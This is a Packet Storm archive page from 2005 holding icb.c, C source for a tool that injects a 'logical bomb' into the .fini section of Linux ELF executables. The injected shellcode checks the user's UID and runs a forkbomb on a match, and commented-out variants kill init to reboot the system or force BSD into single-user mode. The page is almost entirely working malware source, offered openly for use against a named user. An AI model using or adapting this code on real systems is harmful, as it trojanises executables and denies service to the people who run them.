exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

icb.c

icb.c
Posted Apr 18, 2005
Authored by l0om | Site excluded.org

icb was written to inject a small logical bomb in elf files without resizing sections of the file itself.

tags | denial of service
SHA-256 | 61287a1c4dface850c210335f648bd0a3137e0eb906f483141ebcb8d3f9c98af

icb.c

Change Mirror Download
/* icb.c
[i]rish [c]ar [b]omb

WWW.EXCLUDED.ORG
written by l0om

place logical bombs in elf files

**********************************
a logical bomb is destructive program code that gets executed if some
trigger is true. icb was written to inject a small logical bomb in elf
files without resize sections of the file itself. its for linux systems
cause for normal they still suffer from DoS with simple forkbombs.

icb will put a logical bomb in the .fini section and after the program is
executed the current UID of the user is checked for the value you have set
for the trigger. if the conidtion is true the forkbomb is executed.
there are alternatives commented out a bit lower in this source.

the program returns 0 on a placed bomb and 1 for a failure.

badass@linux:~/testlab> ./icb
[i]rish [c]ar [b]omb [version 0.1]
WWW.EXCLUDED.ORG written by l0om

help menu
./icb <destfile> <options>
-v: verbose output
-u: targets UID for the trigger
-n: username on the system to blow away
-h: help
**********************************
greets to www.excluded.org and detach for beeing a nice guy and answering
all my stupid questions all the time - thx dude :)

*/


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pwd.h>
#include <elf.h>

#define SECTION ".fini" //inject code in this section
#define VERSION "0.2" // no comment
#define DEFTARGET 500 // default target is uid 500

char bomb[] = "\xb0\x18\xcd\x80\x3d"
"\xf1\x01" // cmp $0x1f4 ,%eax -> if uid == X then boom
"\x00\x00\x75\x09"
"\xb8\x02\x00\x00\x00\xcd\x80\xeb\xf7"; //forkbomb

/**********[] alternative stuff

if user is root then do kill(1,KILL) this one will reboot most unix systems.
char bomb[] = "\xb8\x25\x00\x00\x00\xb3\x01\xb1\x09\xcd\x80"

if user is root then do kill(1,TERM) this one will switch BSD into single user modus
char bomb[] = "\xb8\x25\x00\x00\x00\xb3\x01\xb1\x0f\xcd\x80"

*/

void header(void);
void help(char *);
int clearsec(int, int, int);
int placebomb(int, int);
int gettargetuid(char *);

int main(int argc, char **argv)
{
int fd, i, verbose = 0, target = DEFTARGET;
Elf32_Ehdr hdr; //elf header
Elf32_Shdr shdr, strtab; //section header
char buf[20];
off_t soff, strsecoff;

if(argc > 1) {
for(i = 1; i < argc; i++)
if(argv[i][0] == '-')
switch(argv[i][1]) {
case 'v':
verbose = 1;
break;
case 'n':
if((target = gettargetuid(argv[++i])) == -1) {
printf("unkown user %s\n",argv[i]);
return 1;
}
break;
case 'u':
target = atoi(argv[++i]);
break;
case 'h':
help(argv[1]);
default:
printf(">>%s<< unknown option\n",argv[i]);
return(1);
}
else if( (fd = open(argv[i], O_RDWR)) == -1) {
perror("open");
return(1);
}
}
else help(argv[0]);

if(verbose) {
header();
printf("\t-----#] placing irish car bomb for user with uid of %d\n",target);
}

//place target uid in the bomb for the trigger
*(long *)buf = (long)target;
bomb[5] = buf[0];
bomb[6] = buf[1];
//done

read(fd, &hdr, sizeof(hdr));
soff = hdr.e_shoff + hdr.e_shstrndx * hdr.e_shentsize;
if(lseek(fd, soff, SEEK_SET) == -1) {
perror("lseek");
return 1;
}
read(fd, &strtab, sizeof(strtab)); //read string secteion
strsecoff = strtab.sh_offset; // give me string section offset

if(verbose) printf("\t-----#] searching for %s\n",SECTION);
for(i = 0; i < hdr.e_shnum; i++) {
lseek(fd, hdr.e_shoff + (i * hdr.e_shentsize), SEEK_SET);
if(read(fd, &shdr, sizeof(shdr)) == -1) {
perror("read");
return(1);
}
lseek(fd, shdr.sh_name + strsecoff, SEEK_SET);
read(fd, buf, 20);

if(memcmp(buf, SECTION, strlen(SECTION)) == 0) { // section found
if(verbose) {
printf("\t-----+] found at offset of 0x%.08x\n",shdr.sh_offset);
printf("\t-----#] placing bomb...\n");
}
if(!clearsec(fd,shdr.sh_offset,shdr.sh_size))
return 1;
if(shdr.sh_size-8 > sizeof(bomb))
return 1;
if(!placebomb(fd,shdr.sh_offset))
return 1;
}
}
if(verbose) printf("\t-----!] bomb placed in %s for UID %d\n",SECTION,target);
return(0);
}

int clearsec(int fd, int offset, int nbytes)
{
int i=0;
char buf[1];

buf[0] = 0x90; //clear section out with NOP
offset += 3; //save the frame instructions: push  %ebp -> mov    %esp,%ebp
nbytes -= 5; //save leave + ret
if(lseek(fd,offset,SEEK_SET) == -1)
return 0;
while(nbytes-- > 0)
if(write(fd,buf,1) == -1)
return 0;
else i++;
return i;
}

int placebomb(int fd, int offset)
{
int i, nlen;
char buf[1];

i = 0;
offset += 3; //save the frame instructions: push  %ebp -> mov    %esp,%ebp
nlen = sizeof(bomb);
if(lseek(fd,offset,SEEK_SET) == -1)
return 1;
while(i < nlen-1) {
buf[0] = bomb[i];
if(write(fd,buf,1) == -1)
return 0;
else i++;
}
return i;
}

int gettargetuid(char *username)
{
struct passwd *pwd;
if( (pwd = getpwnam(username)) == NULL)
return -1;
else return(pwd->pw_uid);
}

void help(char *usage)
{
header();
printf("WWW.EXCLUDED.ORG \t written by l0om\n");
printf("\nhelp menu\n");
printf("\t%s <destfile> <options>\n",usage);
printf("\t-v: verbose output\n");
printf("\t-u: targets UID for the trigger\n");
printf("\t-n: username on the system to blow away\n");
printf("\t-h: help\n");
exit(0);
}

void header()
{
printf("[i]rish [c]ar [b]omb\t[version %s]\n",VERSION);
}
Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    12 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close